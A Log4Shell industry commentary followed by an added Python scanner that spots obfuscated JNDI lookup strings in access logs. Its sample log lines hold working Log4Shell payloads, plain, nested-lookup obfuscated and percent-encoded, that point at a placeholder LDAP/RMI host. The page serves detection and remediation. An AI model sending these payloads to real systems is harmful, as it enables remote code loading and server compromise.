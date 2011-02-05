Comment: Log4Shell exploited for months to come?

December 2021 by Nicholas Sciberras, head of engineering at Invicti’s Acunetix

"Log4Shell is one of the worst vulnerabilities we have ever seen. It can impact businesses, governments, and consumers directly, and it will be exploited for months to come. It’s powerful, ubiquitous, and easy to use – the ultimate hack for someone who wants to do something malicious – even without sophisticated knowledge.

It’s astonishingly easy. Even a typical script kiddie can perform the attack; it doesn’t require a professional blackhat hacker. This is because it requires no authentication, tricks, or jumping from server to server. It’s simply a text string sent to any place that will be logged. And finding such a place is very easy – it can be a simple header, or a simple text field.

Its impacts are everywhere. Java is one of the most popular languages for web applications, mobile applications – practically everything. Log4j is a library used in nearly every Java installation because it is used for logging server operations. Many applications also keep logs for debugging purposes.

It’s powerful. With this vulnerability, attackers gain almost unlimited power – they can extract sensitive data, upload files to the server, delete data, install ransomware, or pivot to other servers.

So what should organizations do? Every organization needs to immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.

More broadly, it’s becoming clear that organizations must adopt processes to build Software Bills of Materials (SBOM) for every application they deploy. They can then use SBOMs to help them focus incident response actions following a zero-day vulnerability announcement such as Log4Shell. Given the widespread use of open-source and other third-party components in modern applications, SBOMs are a foundational element of cyber resilience."
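The "text string sent to any place that will be logged" in the comment above is a Log4j 2 lookup of the form `${jndi:<scheme>://host/path}` (CVE-2021-44228). Scanning logs for it is harder than a substring grep because attackers wrap the literal `jndi` in nested lookups (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) and percent-encode header or query values. The scanner below is an added example written for this page, not code from Nicholas Sciberras, Acunetix or Invicti: it peels those layers off the way Log4j's own substitution would, then looks for the canonical form. The sample access-log lines are constructed, with addresses from the 203.0.113.0/24 documentation range; the set of lookup forms handled is an assumption about what is common, not an exhaustive list.

```python
"""Detect Log4Shell-style JNDI lookup strings in logged values.

Added example, not Acunetix/Invicti code. Handles the nested-lookup and
percent-encoding tricks used to hide the literal "${jndi:" from naive
pattern matching.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no "${" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we ultimately look for once obfuscation has been collapsed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)", re.IGNORECASE)


def _resolve_inner(body: str) -> str:
    """Evaluate one innermost lookup for the forms attackers use to
    spell out "jndi" character by character:
      ${lower:J} / ${upper:j}     -> case-changed text
      ${::-j} / ${env:NOPE:-j}    -> the default value after ':-'
    Any other lookup (${env:HOME}, ${date:yyyy}) becomes "" because the
    request cannot control its value.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    kind, sep, value = body.partition(":")
    if sep:
        kind = kind.strip().lower()
        if kind == "lower":
            return value.lower()
        if kind == "upper":
            return value.upper()
    return ""


def deobfuscate(text: str, max_rounds: int = 32) -> str:
    """Percent-decode once, then collapse nested lookups inside-out until
    the text stops changing. A lookup whose body (or resolved default)
    already reads "jndi:..." is kept verbatim so the final match sees it."""
    text = unquote(text)

    def _sub(m):
        body = m.group(1)
        resolved = _resolve_inner(body)
        if (body.lstrip().lower().startswith("jndi:")
                or resolved.lstrip().lower().startswith("jndi:")):
            return m.group(0)
        return resolved

    for _ in range(max_rounds):
        new = _INNER.sub(_sub, text)
        if new == text:
            break
        text = new
    return text


def find_jndi(text: str) -> List[str]:
    """JNDI schemes referenced by one logged value; [] means clean."""
    return [m.group(1).lower() for m in _JNDI.finditer(deobfuscate(text))]


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """(1-based line number, scheme) for every line carrying a JNDI lookup."""
    hits: List[Tuple[int, str]] = []
    for no, line in enumerate(lines, 1):
        for scheme in find_jndi(line):
            hits.append((no, scheme))
    return hits


# Constructed sample: Apache-style access log lines. The attacker-controlled
# fields are the User-Agent (lines 2, 3) and the query string (line 4).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:RMI}://203.0.113.10:1099/b}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.10%3A1389%2Fc%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.6 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${env:HOME} ${date:yyyy}"',
]

if __name__ == "__main__":
    for no, scheme in scan_log(SAMPLE_LOG):
        print(f"line {no}: JNDI lookup via {scheme}")
```

Run against the constructed sample it flags lines 2, 3 and 4 (ldap, rmi, ldap) and leaves the benign `${env:HOME}` line alone. The detector is for triage of access logs, WAF captures and SIEM searches; it is not a substitute for the fix the comment calls for. The Java system property it alludes to was `log4j2.formatMsgNoLookups=true` (Log4j 2.10 through 2.14.1), which Apache later found insufficient in some non-default configurations (CVE-2021-45046), so upgrading the library remains the only complete remediation.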